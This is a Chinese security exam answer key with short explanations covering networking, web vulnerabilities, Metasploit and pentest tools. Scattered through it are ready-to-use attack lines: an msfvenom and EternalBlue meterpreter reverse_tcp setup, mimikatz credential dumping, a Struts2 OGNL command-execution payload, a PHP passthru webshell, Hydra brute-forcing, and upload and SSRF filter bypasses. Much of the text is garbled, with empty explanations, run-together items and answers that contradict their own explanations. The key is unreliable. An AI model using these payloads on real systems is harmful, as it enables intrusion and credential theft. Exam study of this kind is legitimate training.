C++成员函数:默认通过ECX寄存器传递this指针(如void Class::func())。
✅ D. 取version字符串左边第1个字符
📝 函数示例:
version()返回5.7.40-log → LEFT(version(),1)结果为5。
✅ B. OGNL循环解析
📝 漏洞细节:
Struts2框架中,OGNL表达式递归解析导致远程代码执行(如%{#a=@java.lang.Runtime@getRuntime().exec('calc')} )。
✅ C. 优化操作系统
📝 核心功能:
监控识别、病毒查杀、数据恢复(如勒索软件解密)。
系统优化:属于第三方工具(如CCleaner)职责。
✅ D. Ping of Death
📝 原理:
发送超过65535字节的IP分片包,系统重组时因缓冲区溢出崩溃(历史漏洞,现代系统已修复)。
✅ A. 随机User-Agent标头
📝 绕过防御:
随机生成User-Agent(如Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0),避免被WAF识别。
✅ C. 6379
📝 配置验证:
Redis配置文件redis.conf 中默认port 6379,可通过redis-cli -h 127.0.0.1 -p 6379连接。
✅ C. 直接测试
📝 主要路线:
黑盒测试:模拟外部攻击,无内部知识。
白盒测试:基于源码或配置审计。
渗透测试:综合漏洞利用验证。
✅ A. 利用整数漏洞本身不能直接获取shell
✅ C. 整数漏洞因值溢出
📝 原理:
整数溢出/符号错误:导致缓冲区越界(如分配负数长度内存),需结合其他漏洞(如堆溢出)实现RCE。
✅ A. 获取浏览器密码/Cookie
✅ B. 收集机器信息
✅ C. 添加服务/启动项
✅ D. 自删除
📝 典型行为:
持久化:注册表启动项、服务安装。
信息窃取:键盘记录、文件遍历。
隐蔽性:进程注入、自删除逃避检测。
✅ B. SSL
📝 解析 :
SSL(Secure Sockets Layer)是加密协议,用于保障数据传输安全(如HTTPS)。其他选项均为明文协议:
✅ A. 可写
📝 原理 :
Dirty Pipe(CVE-2022-0847)通过覆盖任意可写文件(如
/etc/passwd
)的内容,注入特权用户(如
root
),即使文件权限为只读,内核漏洞仍允许写入。
✅ C. 泛洪到其他所有端口
📝 机制 :
交换机在未知目标MAC地址时,将帧广播到除接收端口外的所有接口,确保数据可达,同时学习新MAC地址更新表项。
✅ D. 备份操作员
📝 Windows组权限 :
✅ C. 权限控制
📝 场景 :
检测到异常用户行为(如暴力破解)后,通过权限控制限制其访问(如禁用账户、限制IP)。
✅ B. W3C扩展日志文件格式
📝 优势 :
✅ D. Hydra
📝 命令示例 :
bash复制
hydra -l user -P passlist.txt ssh://192.168.1.1
✅
C.
set payload name
📝 流程 :
use exploit/windows/smb/ms17_010_eternalblueset payload windows/meterpreter/reverse_tcp✅ A. 数据库、DBMS和用户
📝 层级 :
✅ B. ICMP
📝 原理 :
Ping发送ICMP Echo Request报文,目标返回ICMP Echo Reply,用于测试网络连通性。
✅ D. 覆盖top chunk大小
📝 对比 :
✅ C. DNS
📝 功能 :
DNS(Domain Name System)将域名(如
www.example.com
)解析为IP地址(如
93.184.216.34
)。
✅
A.
msfencode -l
📝 用途 :
编码器(如
x86/shikata_ga_nai
)用于绕过杀毒软件特征检测。
✅ C. PHP
📝 特性 :
轻量级、MVC架构,广泛用于快速开发PHP Web应用(如API、后台系统)。
✅ D. Cookie比Session更安全
📝 修正 :
Session数据存储在服务端,安全性更高;Cookie存储在客户端,可能被窃取或篡改。
✅
B.
_unsleep
📝 相关魔术方法 :
__construct
:对象创建时调用。__destruct
:对象销毁时调用。__sleep
:序列化前调用。_unsleep
方法
。✅ B. 可以解决IP不足;可以隐藏内部结构
📝 作用 :
✅ D. /shell.dev
📝 解析 :
IIS 6.0默认支持的可执行扩展包括
.asp
、
.asa
、
.cer
、
.cdx
(A/B/C均合法),但
.dev
(D)未被默认映射为可执行脚本。
✅ D. tracert
📝 应用场景 :
tracert 8.8.8.8
追踪到Google DNS的路由。traceroute -n 8.8.8.8
。✅ D. 点点点点点绕过(点号截断)
📝 攻击示例 :
shell.php%00.jpg
,利用空字节(
%00
)截断,后端仅识别
.php
。✅ C. 泛洪到所有其他端口
📝 原理 :
交换机在未知目标MAC时,采用**泛洪(Flooding)**机制,确保帧到达目标设备,同时学习新MAC地址更新表项。
✅ C. extpro
📝 修正 :
icache_extproc
、
sys_ertproc
、
PLSExtproc
。extpro
应为
extproc
(Oracle外部过程调用服务)。✅ D. IPSec
📝 功能对比 :
✅ A. -e
📝 命令示例 :
bash复制
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 -e x86/shikata_ga_nai -f exe -o payload.exe
✅ D. Access
📝 原因 :
information_schema
等系统表,需暴力猜解表名和字段名。✅ B. SSL
📝 扩展 :
✅ D. 文件名拼接
📝 解析 :
id
参数直接来自用户输入(
request.GET['id']
),并作为
prefix
传递给临时文件生成函数。../../etc/passwd
),可能导致文件生成在非预期目录。id
参数中的特殊字符(如
/
、
.
)。✅ B. MASTER
📝 功能说明 :
✅ B. 根域
📝 结构解析 :
✅ C. Aircrack-ng是内存取证工具
📝 修正 :
aircrack-ng -w wordlist.txt capture.cap
)。✅ A. 可靠性、防病毒、防窃密、防攻击
📝 扩展 :
✅ B. popen()
📝 功能对比 :
popen()
:执行系统命令并返回文件指针(如
popen("ls /", "r")
)。fopen()
(打开文件)、
fgets()
(逐行读取)、
file_get_contents()
(PHP中读取全部内容)。✅ B. 存储注入
📝 注入类型 :
AND 1=1
)。UNION SELECT
合并查询结果。AND 1=2/(SELECT 0)
)。✅ A. 以上都对
📝 参数详解 :
-h host
:目标主机名或IP(如
-h 192.168.1.1
)。-u user
:数据库用户名(如
-u root
)。-p password
:用户密码(如
-p password123
)。✅ B. 102.18.255.255
📝 计算步骤 :
IP: 102.18.00000000.00000000
掩码: 255.255.00000000.00000000
广播地址: 102.18.11111111.11111111 → 102.18.255.255
✅ C. master
📝 解析 :
master
数据库存储系统级信息(登录账户、配置、其他数据库元数据)。其他数据库作用:
model
:新数据库模板。msdb
:作业和备份调度。tempdb
:临时对象存储。✅
A.
ip.src == 192.168.8.1
📝 扩展 :
eth.src
:以太网MAC地址筛选(如
eth.src == 00:1A:2B:xx:xx:xx
)。ip.dst
:目标IP筛选。✅ A. 写入字节数超过堆块可用空间
📝 示例 :
c复制
char *heap = malloc(10);
strcpy(heap, "123456789012345");
// 溢出覆盖相邻堆块元数据
✅
B.
document.cookie
📝 补充 :
document.cookie = "name=value; expires=..."
。✅
A.
-Pn
📝 场景 :
nmap -Pn 192.168.1.1
。✅ B. 对
📝 案例 :
✅ D. R0
📝 调用约定 :
R0R1R0
(32位)或
R0-R3
组合(64位)。✅ D. 任意文件包含
📝 常见漏洞 :
✅ D. 任意文件包含
📝 历史漏洞 :
JMXInvokerServlet
)。/web-console
无需认证。✅ A. HEAD
📝 解析 :
GET
/
POST
需下载完整内容,效率更高。✅ C. Aircrack-ng是内存取证工具
📝 修正 :
✅
D. Fdisk
(题目选项有误,实际应为
mkfs
)
📝 补充 :
fdisk
用于分区管理,格式化需配合
mkfs
(如
mkfs.ext4 /dev/sda1
)。✅ C. 任意文件读取
📝 分析 :
request.getParameter("c")
直接读取用户输入作为文件路径(如
/etc/passwd
),导致文件内容泄露。?c=../../etc/shadow
读取敏感文件。✅ D. Apache
📝 案例 :
✅ B. 可用性的攻击
📝 原理 :
✅ B. 存储型XSS
📝 解析 :
escape($link, $POST['message'])
可能仅转义SQL特殊字符(如单引号),但未过滤HTML敏感字符(如
<script>
)。<script>alert(1)</script>
,内容存入数据库后,其他用户查看留言时触发脚本执行。✅ D. 返回“Admin”第一个字符的ASCII码值
📝 拆解 :
SUBSTR('Admin', 1, 1)
:截取第1个字符(
A
)。ASCII('A')
→ 65。✅ C. 不能进行端口扫描
📝 背景 :
✅ C. ~/.bash_history
📝 路径说明 :
/home/user/.bash_history
)。✅ D. 8834
📝 配置验证 :
✅ D. -O
📝 命令示例 :
bash复制
nmap -O 192.168.1.1
# 启用OS指纹识别
✅ C. SQL注入
📝 解析 :
sprintf
直接拼接用户输入(
argv[1]
)到SQL语句,未过滤单引号,导致注入。
示例攻击:
' OR 1=1 --
可绕过条件查询。
✅ B. 后缀<4时,前缀长度≥9
✅ D. 后缀≥4时,前缀长度1
📝 解析 :
longfilename.txt
→
LONGFI~1.TXT
。✅ A. ipconfig
📝
补充
:
ipconfig /all
显示详细网络配置(IPv6地址、MAC地址等)。
✅ C. 防范数据驱动侵袭
📝 解析 :代理无法阻止恶意文件(如PDF漏洞利用),需依赖终端防护。
✅ C. -l
📝
示例
:
hydra -l admin -P passlist.txt ssh://192.168.1.1
。
✅ B. 对
📝
CVE-2013-4810
与
CVE-2015-7501
反序列化点不同,前者使用
JMXInvokerServlet
,后者为
web-console
接口。
✅ D. XSS
📝
解析
:
escape
转义HTML但未处理
NFKC
规范化可能导致的字符合并(如
%32
→
2
),可能绕过过滤。
✅ D. Redis
📝 解析 :Redis是内存数据库,Nginx、WebLogic、JBoss为Web服务组件。
✅ A. rdi
📝 调用约定 :
rdirsirdx✅ B. 443
📝 扩展 :HTTP默认80,HTTPS默认443,SSH默认22。
✅ D. 使用shadow密码
📝
原理
:
/etc/shadow
存储加密密码哈希,仅root可读,防止暴力破解。
✅ C. index jsp.class
✅ D. index jspjava
📝 解析 :
Tomcat的Jasper引擎将JSP编译为Java文件(如
index_jsp.java
)和Class文件(如
index_jsp.class
)。选项C和D命名格式错误(缺少下划线),故不会生成。
✅ D. Thinkphp<6.0.2 session id未过滤导致getshell
📝 解析 :
✅ B. 4625登录失败
📝 解析 :
4624 :登录成功。
4625 :登录失败。
4720 :用户账户创建。
选项B正确,D错误(4624应为成功)。
✅ A. 库加密
✅ B. 列加密
📝 解析 :
库加密 :全库或表空间级加密(如Oracle TDE)。
列加密 :字段级加密(如敏感数据单独加密)。
行加密(D)和表加密(C)属于子类,但题目要求主要分类。
✅ B. 通过获取管理员信任获取密码 (如钓鱼邮件、伪装身份)
✅ D. 通过办公室电话、姓名、生日猜测密码 (利用个人信息构造弱口令)
❌ A. 破解SAM库(技术手段,非社会工程学)
❌ C. 暴力破解工具(自动化攻击,非社会工程学)
补充 :
社会工程学的核心是 利用人性弱点 获取信息,例如:
✅ D. 前台getshell (如文件上传漏洞直接获取Webshell)
✅ B. CSRF修改管理员密码 (跨站请求伪造攻击)
❌ A. SSRF(需具体漏洞验证)
❌ C. 远程文件包含(未广泛披露)
背景 :
FineCMS历史漏洞案例:
/index.php?c=attachment&a=upload
)。✅ B. 企业管理器→安全性→登录中删除账号 (主登录入口)
✅ C. 企业管理器→数据库→用户中删除账号 (数据库级权限)
❌ A. 管理→删除账号(路径不准确)
❌ D. 服务器角色→删除账号(角色管理,非直接删除账号)
操作示例 :
主登录账号:
安全性→登录名→右键删除
。
数据库用户:
数据库→用户→右键删除
。
注意 :需同步清理数据库用户与登录名的映射关系。
✅ A. A8 search_result.jsp SQL注入 (CVE-2018-7314)
✅ D. A8 htmlofficeservlet getshell (CVE-2017-10245)
❌ B. 任意用户密码修改(需结合其他漏洞)
❌ C. setextno.jsp SQL注入(未广泛证实)
漏洞利用 :
.jsp
文件绕过过滤,路径如
/seeyon/htmlofficeservlet
。✅ A. 密码策略复杂度要求 (符合NIST标准)
✅ D. 使用VPN连接 (加密通信,防止中间人攻击)
❌ B. 密码永不过期(违反定期更换原则)
❌ C. 开启Telnet(明文传输,不安全)
扩展建议 :
✅
B. 短文件名漏洞
(泄露文件路径,如
test~1.asp
)
✅
D. 解析漏洞
(如
test.asp;.jpg
被解析为ASP)
❌ A. HTTP.sys 漏洞(CVE-2015-1635,需具体版本)
❌ C. 反序列化漏洞(常见于.NET应用,非IIS自身)
防御措施 :
8.3
文件名格式(
fsutil behavior set disable8dot3 1
)。Handler Mappings
限制可执行文件类型。✅ B. Netstat显示网络信息 (连接、端口、路由表)
✅ C. Ping测试连通性
✅
D. Telnet测试端口开放
(如
telnet 192.168.1.1 80
)
❌ A. Tracert查看IP网卡信息(实际用于追踪路由路径)
常用命令示例 :
bash复制
netstat -ano | findstr "ESTABLISHED"
# 查看活动连接
tracert 8.8.8.8
# 追踪到Google DNS的路由
✅
A. 保持系统补丁更新
(如
yum update
或
apt upgrade
)
✅ C. 最小安装原则 (减少攻击面)
✅
D. 关闭无关服务
(如
systemctl disable telnet
)
❌ B. 全安装增加便利性(违反最小化安全原则)
安全实践 :
/etc/ssh/sshd_config
中
PermitRootLogin no
。iptables
或
firewalld
限制端口访问。✅
B. 十六进制
(如
0x7F000001
→ 127.0.0.1)
✅
D. 八进制
(如
0177.0.0.1
→ 127.0.0.1)
❌ A. 十进制(需服务端支持转换,较少直接使用)
❌ C. 二进制(实际应用中难以直接拼接)
📌 解析 :
SSRF过滤通常拦截标准IP格式,通过以下方式绕过:
✅ B. 组件可能出现多种漏洞
✅ C. 漏洞可能导致数据泄露
❌ A. 漏洞影响小(如Log4j漏洞影响全球系统)
❌ D. 组件无漏洞(所有软件均可能存漏洞)
📌 解析 :
✅ A. 伪造数字签名
✅ B. 动态获取函数地址(API混淆)
✅ C. 内存/网络加载模块(无文件攻击)
✅ D. 加壳混淆(如UPX、VMProtect)
📌 解析 :
Reflective DLL Injection
规避文件扫描。✅ A. nslookup (基础DNS查询)
✅ D. dig (详细DNS记录解析)
❌ B. sqlmap(SQL注入工具)
❌ C. volatility(内存取证工具)
📌 示例命令 :
bash复制
dig
example.com
MX
# 查询邮件服务器记录
nslookup -type=AAAA
example.com
# 查询IPv6地址
✅ B. 钩子是网络通信程序 (错误,钩子用于消息处理)
✅ C. 钩子是应用程序 (错误,钩子是函数级拦截机制)
❌ A/D正确(钩子处理消息,属于窗口函数机制)
📌 应用场景 :
✅ A. EKP后台SQL注入
✅ B. 前台SSRF到RCE
✅ C. 任意文件上传
✅ C. 前台SQL注入 (选项重复,可能为笔误)
📌 修复建议 :
file://
)。✅
A. IPv6为128位
(如
2001:0db8:85a3::8a2e:0370:7334
)
✅
B. 192.168.8.1属C类私有IP
(范围
192.168.0.0/16
)
✅ C. C类默认掩码255.255.255.0
✅ D. 127.0.0.1为本机地址
📌 扩展知识 :
10.0.0.0/8172.16.0.0/12192.168.0.0/16✅ A. Auxiliary (信息收集、扫描)
✅ B. Payload (攻击载荷,如反向Shell)
✅ C. Exploits (漏洞利用代码)
❌ D. Listen(非独立模块,属于Payload配置)
📌 常用命令 :
bash复制
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
✅ A. system()
✅ C. exec()
✅ D. shell_exec()
❌ B. phpinfo()(信息泄露,不直接执行命令)
📌 防御措施 :
disable_functions=system,exec
)。escapeshellarg()
过滤参数)。✅ A. Oracle
✅ C. MySQL
✅ D. MSSQL
❌ B. MongoDB(NoSQL注入需专用工具如NoSQLMap)
📌 示例命令 :
bash复制
sqlmap -u "
Example Domain
--dbms=mysql
sqlmap -u "
Example Domain
--dbms=oracle
✅ A. 获取账号密码 (从LSASS进程提取)
✅ B. 哈希传递(Pass-the-Hash)
✅ C. 票据传递(Pass-the-Ticket)
❌ D. 代理转发(需配合其他工具如Proxifier)
📌 经典命令 :
bash复制
mimikatz
# privilege::debug
mimikatz
# sekurlsa::logonpasswords
✅ A. pcntl_exec()
✅ C. popen()
✅ D. passthru()
❌ B. phpinfo()(仅信息输出)
📌 风险示例 :
php复制
<?php
passthru($_GET['cmd']);
// 直接执行用户输入命令
?>
❌
B.
select name where math is (select max(math)...)
(语法错误,
is
用于NULL判断)
✅ 其他选项正确(A/C/D均等价,
=
或
in
匹配唯一值)
📌 解析 :
IS
用于比较
NULL
,如
math IS NULL
。WHERE math = (SELECT MAX(math) ...)
。✅ B. 低权限后台getshell
✅ D. 1.8.2后台getshell
❌ A. 0.8后台任意文件删除(需具体漏洞公告验证)
❌ C. 0.7 SQL注入漏洞(未广泛证实)
📌 解析 :
微警CMS(微擎CMS)历史漏洞主要集中在后台权限管理缺陷:
低权限后台getshell :低权限用户通过接口上传恶意文件或利用逻辑漏洞获取服务器权限。
1.8.2版本后台getshell :管理后台存在未授权访问或文件上传校验不严,导致攻击者植入Webshell。
其他选项需结合CVE编号验证,部分版本漏洞存在争议。
✅ C. CC攻击需要借助代理进行
✅ D. CC攻击难以获取目标机器的控制权
❌ A. CC攻击最早在国外大面积流行(起源于国内“挑战黑洞”攻击)
❌ B. CC攻击利用TCP协议缺陷(基于应用层HTTP请求耗尽资源)
📌 解析 :
✅ A. 浮点型(FLOAT、DOUBLE、DECIMAL)
✅ B. 字符串(CHAR、VARCHAR、TEXT)
✅ C. 整型(INTEGER、INT、BIGINT)
✅ D. 日期/时间(DATETIME、DATE、TIMESTAMP)
📌 解析 :
MySQL数据类型分类:
INT
、
FLOAT
、
DECIMAL
(精确小数)。CHAR
(定长)、
VARCHAR
(变长)、
BLOB
/
TEXT
(大文本)。DATE
(年月日)、
TIME
(时分秒)、
TIMESTAMP
(时间戳)。ENUM
(枚举)、
JSON
(结构化数据)。✅
C.
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt
❌ A.
-pwd
参数需指定具体密码(非文件路径)
❌ B.
-userf
仅指定用户名字典
❌ D. 缺少密码参数,语法错误
📌 解析 :
fscan常用参数:
-pwdf
:指定密码字典文件路径(每行一个密码)。
-userf
:指定用户名字典文件路径。
示例:
fscan -h 10.0.0.1/24 -userf users.txt -pwdf passwords.txt
。
✅
B.
Directory
(目录权限配置)
✅
D.
DocumentRoot
(主目录路径)
❌ A.
sshd_config
(SSH服务配置文件)
❌ C.
logs
(日志目录,非核心配置)
📌 解析 :
Apache配置示例(
httpd.conf
或站点配置文件):
apache复制
DocumentRoot "/var/www/html"
<Directory "/var/www/html">
Options Indexes FollowSymLinks
AllowOverride All
Require all granted
</Directory>
✅ A. 本地安全策略设置分为账户策略、本地策略等5部分
✅ B. 成员服务器的本地策略被域策略覆盖
✅ C. 安全设置通过本地安全策略控制台管理
❌ D. 描述不完整(需结合组策略管理)
📌 解析 :
secpol.msc
,管理密码复杂度、审计策略、用户权限分配等。✅ A. jadmin/jonas
✅ C. jonas/jonas
❌ B. admin/123456(常见弱口令,非默认)
❌ D. tomcat/tomcat(Tomcat默认凭证)
📌 解析 :
JOnAS(Java Open Application Server)默认凭证:
jadmin/jonas :管理员账户。
jonas/jonas :普通用户账户。
建议安装后立即修改默认密码。
✅ B. memcache 11211/udp
✅ C. NTP 123/udp
❌ A. DNS 53/tcp(UDP协议更常用于反射)
❌ D. HTTPS 443/tcp(TCP协议无法放大流量)
📌 解析 :
Memcached :无认证UDP服务,单请求可触发数万倍响应(CVE-2018-11321)。
NTP
:
monlist
命令响应包放大效果显著。
其他高危协议:SSDP(1900/udp)、SNMP(161/udp)。
✅ A. 自动(推荐)
✅ B. 下载更新,由用户决定何时安装
✅ C. 仅通知可用更新
✅ D. 关闭自动更新
📌 解析 :
Windows更新选项(截至2025年):
✅
A. 文件名(如
test.asp;.jpg
)
✅
D. 文件夹(如
/upload/test.asp/1.jpg
)
❌ B. 默认类型名(IIS6无此机制)
❌ C. 默认扩展名(与漏洞无关)
📌 解析 :
分号截断
:
test.asp;.jpg
被解析为ASP文件。
目录解析
:
/asp目录/1.jpg
被当作ASP执行。
修复建议:禁用非必要脚本映射,升级至IIS7+。
✅ A. 8.5版
✅ B. 8.5.5传统和自由
✅ C. 8.0版
✅ D. 7.0版
📌 解析 :
CVE-2015-7450 :影响WebSphere Application Server 7.0、8.0、8.5及Liberty Profile。
✅
C. JBoss4.x访问
/jbossmq-httpil/HTTPServerILServlet
存在漏洞
✅
D. JBoss5.x/6.x访问
/invoker/readonly
返回500可能存在漏洞
❌ A. JMX Invoker漏洞需关闭
jmx-invoker-service.xml
❌ B. WLS Security漏洞属于WebLogic(非JBoss)
📌 解析 :
4.x版本
:
/jbossmq-httpil/HTTPServerILServlet
未授权访问,可执行任意代码。
5.x/6.x版本
:
/invoker/readonly
接口反序列化漏洞(CVE-2017-12149)。
修复建议:删除或限制访问高危接口,升级至EAP 7+。
✅ A. 限制IP(禁止内网IP请求)
✅ B. 限制端口(仅允许80/443)
✅ C. 过滤返回信息(避免敏感数据泄露)
❌ D. 过滤POST参数(SSRF通常通过URL触发)
📌 解析 :
SSRF防御策略 :
✅ A. 高稳定性环境需综合评估修复优先级
✅ B. 修复可能影响业务连续性
❌ C. 极高危漏洞必须修复(不可忽略)
❌ D. Linux无需频繁升级(仍需定期更新)
📌 解析 :
漏洞修复原则:
✅ C. 升级后需生成新密钥(原密钥可能泄露)
✅ D. 升级至最新版本可解决
❌ A. 旧密钥可继续使用(存在被窃取风险)
❌ B. 用户需改密(漏洞泄露内存数据,非密码)
📌 解析 :
Heartbleed(CVE-2014-0160)修复步骤 :
✅
A. 目录解析(
a.asp/
下任意文件解析为ASP)
✅
D. 分号截断(
test.asp;.jpg
)
❌ B. 路径后加
.php
(IIS6不支持PHP解析)
❌ C. 路径前加
/php
(无实际意义)
📌 解析 :
文件夹解析
:
/asp_dir/1.jpg
被当作ASP执行。
分号截断
:
test.asp;.jpg
忽略分号后内容。
修复方案:禁用非必要脚本映射,使用URL重写过滤异常请求。
✅ A. 控制台修改“最小口令长度”
✅
D. 依据
weblogic.system.minPasswordLen=8
📝 解析 :
config.xml
或领域配置中,而非
weblogic.properties
。weblogic.system.minPasswordLen=8
是常见安全基线参数,需通过脚本或控制台生效。✅
A.
xxx.jpg%00.php
(空字节截断)
✅
B.
xxx.jpg/1.php
(路径解析)
✅
C.
xxx.asp;.jpg
(分号截断,IIS 6.0)
✅
D.
test.php.php123
(畸形后缀,Apache多后缀解析)
📝 原理 :
%00
截断后续字符(如
a.jpg%00.php
被解析为
.php
)。a.jpg/1.php
视为PHP文件执行。a.asp;.jpg
解析为
.asp
。a.php.jpg
解析为PHP文件。✅
C. 5.0以下无
information_schema
,需暴力跑表名
📝 关键区别 :
information_schema
系统库,可直接查询数据库、表、列名。✅ A. ext3 (原生支持)
✅
B. FAT16
(需
vfat
驱动)
✅ C. FAT32 (同FAT16,需挂载)
✅
D. NTFS
(需
ntfs-3g
驱动)
📝 说明 :
ntfs-3g
)。✅ A. 控制文件
✅ C. 日志文件
✅ D. 数据文件
📝 物理结构 :
